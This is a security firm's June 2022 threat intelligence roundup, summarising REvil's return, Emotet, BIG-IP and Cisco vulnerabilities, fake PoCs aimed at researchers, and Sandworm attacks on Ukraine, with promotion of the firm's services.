Threat Intel Roundup
Published: 01 June 2022
Content
01. Summary
02. Threat Spotlight
- REvil REturns with new data-leak site
03. Quick News Bites
- New Emotet campaign attributed to TA542
- Threat actors hide malware in plain sight in Windows event logs
- Attackers exploit critical BIG-IP vulnerability
- Cisco zero-day vulnerability exploited, patched
- Threat hunters are hunted with fake PoC, Cobalt Strike
- Sandworm attacks Ukrainian energy sector
04. Conclusion
Integrity360 dealt with a blast from the (not so distant) past in May, starting the month off with assisting a client who had fallen prey to the notoriously trivial Log4j vulnerability. Although the vulnerability was disclosed back in November 2021, we are still seeing unknowingly vulnerable clients 6 months later. It is a well-known trend in Cyber Security that cyber defences are always one step behind the attackers, especially when it comes to zero-day vulnerabilities. In the case of Log4j, it is still widely exploited simply because it is incorporated into an extremely large number of applications, either directly or in third-party libraries. The client in question that got breached was unaware that a product they were using was in turn using Log4j because it leveraged it in-turn via another third-party plug in. One of the many defences against this type of wide-spread vulnerability is to discover meticulously what third-party libraries your ICT products use. Of course, this will be difficult given that most vendors don’t disclose them publicly, but it’s worth a try for when the next Log4j comes around.
One thing we have noticed about the most recent ransomware attacks is that attackers are not so much interested in encrypting users' PC’s/laptops anymore. The main goal for attackers is to gain access to the client’s hypervisor (such as their ESXi) and encrypt the virtual machines and datastores themselves, rather than the Operating System inside them. It is much more disruptive, and most hypervisor’s use proprietary Operating Systems meaning there is little in the way of anti-virus products.
REvil REturns with new data-leak site
New information suggests that the notorious REvil ransomware operation has resumed its activity, following its takedown in January 2022 that led to the arrest of 14 of its members. 1 In late April 2022, REvil’s Tor (The Onion Router) infrastructure became active again, redirecting visitors to a data-leak website belonging to an unnamed extortion group. Victims from nearly every geography and sector, including many entities that were previously mentioned on REvil’s old data-leak website “Happy Blog”2 , were named on the new website. The presence of new victims on this data-leak site indicates that the group behind this operation is likely active. At the time of writing, the data-leak website displays details about the recruitment process for this new ransomware operation; it is likely that the intention of the threat actors behind this operation is to set up a ransomware-as-a-service (RaaS) program. Affiliates who join the program will reportedly benefit from an improved version of REvil ransomware and an 80/20 split for those collecting ransoms. According to the website’s operators, the unnamed group will use the escrow system of the Russian-language cybercriminal forum RuTOR for communication between operators and affiliates. Although attribution is unconfirmed, multiple factors indicate that this unnamed cyber extortion group (CEG) is likely linked to REvil. As well as infrastructure and victim overlaps, a newly discovered ransomware sample used by this group is highly likely compiled directly from REvil’s source code. 3 In addition, cybercriminal discussions have hinted that REvil members are responsible for this new ransomware operation.
New Emotet campaign attributed to TA542
The threat group “TA542” launched a new “Emotet” phishing campaign that masqueraded password-protected Windows .LNK ZIP files as Word documents. When victims clicked on the shortcut, it executed a malicious PowerShell script which downloaded the Emotet payload from a list of previously compromised sites. This technique can bypass security tools, leaving organizations at a higher risk of a ransomware attack.
Threat actors hide malware in plain sight in Windows event logs
Cyber-security researchers reported on a new cyber campaign, tracked as “SilentBreak”. Occurring as early as September 2021. SilentBreak involved the novel technique of injecting shellcode payloads into Windows event logs via a customized malware dropper. Doing so enabled attackers to plant fileless malware in the compromised system while avoiding detection. The use of sophisticated techniques and tools indicates that a state-associated threat actor or group is likely responsible for this campaign.
Attackers exploit critical BIG-IP vulnerability
Since F5 disclosed a critical vulnerability affecting its BIG-IP devices on 04 May 2022, there have been several reports of attackers attempting to exploit the vulnerability. The vulnerability tracked as CVE-2022-1388, would allow an unauthenticated attacker to execute commands on BIG-IP network devices. Although most attempts have sought to gain initial access to vulnerable devices, cyber-security researchers observed two instances in which attackers sought to erase files. As the vulnerability would allow attackers to gain root privileges, it is realistically possible for these actors to delete configuration files required for the BIG-IP device to operate properly. Users are urged to apply patches as soon as possible.
Cisco zero-day vulnerability exploited, patched
On 20 May 2022, Cisco announced that it had patched an actively exploited zero-day vulnerability (CVE-2022-20821). The flaw, found in Cisco IOS XR, allows an attacker to remotely access instances of Redis, an in-memory database, running in the NOSi Docker container. Attackers may write and retrieve information from Redis, although they are unable to remotely execute code. Users of IOS XR software version 7.3.3, with health check RPM Package Manager running and active, should update immediately.
Threat hunters are hunted with fake PoC, Cobalt Strike
On 23 May 2022, researchers reported on a new threat campaign that targeted cyber-security researchers with the Cobalt Strike exploit kit. The attackers lured researchers with a fake proof of concept (PoC) for two recently patched RCE vulnerabilities in Microsoft Windows: CVE-2022-24500 and CVE-2022-26809. The campaign has not been attributed to a specific threat actor or group but targeting cyber-security researchers is a technique previously used by North Korea-linked “Lazarus Group”. Security researchers are in possession of zero-day exploits and sensitive information, making them attractive targets for various types of threat actors.
Sandworm attacks Ukrainian energy sector
On 20 May 2022, cyber-security researchers observed the Russia-linked “Sandworm” APT group targeting a Ukrainian energy provider with the new “ArguePatch” loader malware. The APT group used the “CaddyWiper” destructive wiper malware to obfuscate traces of the “Industroyer2” malware, which is deployed to target Ukrainian critical infrastructure. In 2016 Sandworm disabled power systems in Ukraine using an earlier version of Industroyer2.
Integrity360 hosted its second security conference of 2022, “Security First”, this time in Dublin in May. The conference with a great success very informative discussions and presentations. Including one from Sir Alex Younger, the former Chief of the British Secret Intelligence Service (MI6) who gave a very interesting talk around how intelligence ties into cyber-security.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively email us at TBD@integrity360.com for a complimentary, no-commitments consultation. Also feel free to explore the many cyber security resources available on our website by clicking here.
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services, such as Managed SIEM and Managed Detection and Response (MDR).
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.
Disclaimer
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.
Need advice?
If you are worried about any of the threats outlined in this roundup or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager or fill in the form for a complimentary no-commitment consultation.
More detailed threat intelligence news?
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.
